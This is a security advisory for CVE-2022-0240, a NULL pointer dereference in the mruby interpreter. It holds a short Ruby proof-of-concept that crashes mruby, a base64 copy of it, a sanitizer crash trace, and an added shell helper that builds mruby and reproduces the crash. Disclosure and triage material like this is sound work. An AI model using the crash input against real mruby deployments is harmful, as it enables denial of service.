CVE-2022-0240: NULL Pointer Dereference in mruby

mruby is vulnerable to NULL Pointer Dereference

Description

There is a NULL Pointer Dereference in prepare_singleton_class (src/class.c:360:13). The bug was reproduced on the latest mruby commit at the time of reporting (hash 171d32c0071d776207174a40a8fa26def3dbb931) on Ubuntu 20.04 for x86_64/amd64. The sanitizer trace below shows the dereference being reached through mrb_singleton_class, which the VM calls while the PoC defines the singleton method in its last line (def c.e()end).

Proof of Concept

1.times{b={}
a=0
[**0,m:0]
c={0=>0,nil=>nil}[0]
def m()end
def c.e()end}

Steps to reproduce

1- Clone the mruby repository and build it with ASan/UBSan using MRUBY_CONFIG=build_config/clang-asan.rb rake

2- Decode the base64-encoded PoC into a file and run it with the sanitizer-instrumented mruby binary:

$ echo -ne "MS50aW1lc3tiPXt9CmE9MApbKiowLG06MF0KYz17MD0+MCxuaWw9Pm5pbH1bMF0KZGVmIG0oKWVuZApkZWYgYy5lKCllbmR9Cg==" | base64 -d > poc
$ build/host/bin/mruby ./poc
/home/octa/mruby/src/class.c:360:13: runtime error: member access within null pointer of type 'struct RClass'
SUMMARY: UndefinedBehaviorSanitizer: undefined-behavior /home/octa/mruby/src/class.c:360:13 in 
AddressSanitizer:DEADLYSIGNAL
=================================================================
==31695==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000010 (pc 0x0000005270f8 bp 0x7ffec6a14090 sp 0x7ffec6a13d80 T0)
==31695==The signal is caused by a READ memory access.
==31695==Hint: address points to the zero page.
    #0 0x5270f8 in prepare_singleton_class /home/octa/mruby/src/class.c:360:13
    #1 0x52688f in mrb_singleton_class_ptr /home/octa/mruby/src/class.c:1685:3
    #2 0x528785 in mrb_singleton_class /home/octa/mruby/src/class.c:1692:22
    #3 0x600757 in mrb_vm_exec /home/octa/mruby/src/vm.c:2918:17
    #4 0x566ee9 in mrb_vm_run /home/octa/mruby/src/vm.c:1128:12
    #5 0x55c339 in mrb_top_run /home/octa/mruby/src/vm.c:3050:12
    #6 0x88b6ce in mrb_load_exec /home/octa/mruby/mrbgems/mruby-compiler/core/parse.y:6882:7
    #7 0x88d2dc in mrb_load_detect_file_cxt /home/octa/mruby/mrbgems/mruby-compiler/core/parse.y:6925:12
    #8 0x4c9118 in main /home/octa/mruby/mrbgems/mruby-bin-mruby/tools/mruby/mruby.c:347:11
    #9 0x7f46ef9450b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
    #10 0x41d82d in _start (/home/octa/mruby/build/host/bin/mruby+0x41d82d)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/octa/mruby/src/class.c:360:13 in prepare_singleton_class
==31695==ABORTING
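The two steps above as a single reproduction script. This is an added helper, not part of the original advisory or of the mruby project; it assumes git, rake, clang and base64 are installed, and it pins the commit hash, build config and base64 PoC quoted in the advisory. The classify_sanitizer_output function turns the sanitizer's stderr into a one-word verdict so the script can be used in a triage loop (for example to confirm a fix, or to re-test other PoCs), and it can be exercised on saved sanitizer output without building anything.

```shell
#!/bin/sh
# Reproduction helper for CVE-2022-0240 (added example, not the advisory's own code).
# Assumptions: git, rake, clang and base64 are on PATH; the commit hash, build
# config and PoC bytes are the ones quoted in the advisory.
set -eu

MRUBY_COMMIT=171d32c0071d776207174a40a8fa26def3dbb931
POC_B64="MS50aW1lc3tiPXt9CmE9MApbKiowLG06MF0KYz17MD0+MCxuaWw9Pm5pbH1bMF0KZGVmIG0oKWVuZApkZWYgYy5lKCllbmR9Cg=="

# Write the decoded PoC to the path in $1 and echo its plaintext for review.
write_poc() {
  printf '%s' "$POC_B64" | base64 -d > "$1"
  cat "$1"
}

# Classify sanitizer output read from stdin. Prints exactly one token:
#   segv:<function>  ASan reported a SEGV; <function> is the frame in its SUMMARY line
#   ubsan            only UBSan's null member access was reported, no ASan report
#   clean            neither report is present
# Always exits 0; callers branch on the printed token, not on the exit status.
classify_sanitizer_output() {
  out=$(cat)
  frame=$(printf '%s\n' "$out" \
    | sed -n 's/^SUMMARY: AddressSanitizer: SEGV .* in \([A-Za-z_][A-Za-z0-9_]*\).*$/\1/p' \
    | head -n1)
  if [ -n "$frame" ]; then
    echo "segv:$frame"
  elif printf '%s\n' "$out" | grep -q 'member access within null pointer'; then
    echo "ubsan"
  else
    echo "clean"
  fi
}

# The advisory's procedure end to end: clone at the reported commit, build with
# the ASan/UBSan config, run the PoC and print what the sanitizers saw.
reproduce() {
  workdir=$1
  if [ ! -d "$workdir/.git" ]; then
    git clone https://github.com/mruby/mruby "$workdir"
  fi
  ( cd "$workdir" && git checkout -q "$MRUBY_COMMIT" \
      && MRUBY_CONFIG=build_config/clang-asan.rb rake >/dev/null )
  write_poc "$workdir/poc" >/dev/null
  # ASan aborts with a non-zero status; capture stderr and keep going.
  result=$("$workdir/build/host/bin/mruby" "$workdir/poc" 2>&1 || true)
  printf '%s\n' "$result" | classify_sanitizer_output
}

# The clone-and-build step is only run when explicitly requested:
#   REPRO_RUN=1 sh repro.sh [workdir]
if [ "${REPRO_RUN:-0}" = 1 ]; then
  reproduce "${1:-mruby-cve-2022-0240}"
fi
```

Running it with REPRO_RUN=1 against the pinned commit is expected to print segv:prepare_singleton_class, matching the SUMMARY line of the trace above; a build that contains a fix should print clean.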

Acknowledgements

This bug was found by Octavio Gianatiempo ([email protected]) and Octavio Galland ([email protected]) from Faraday Research Team.
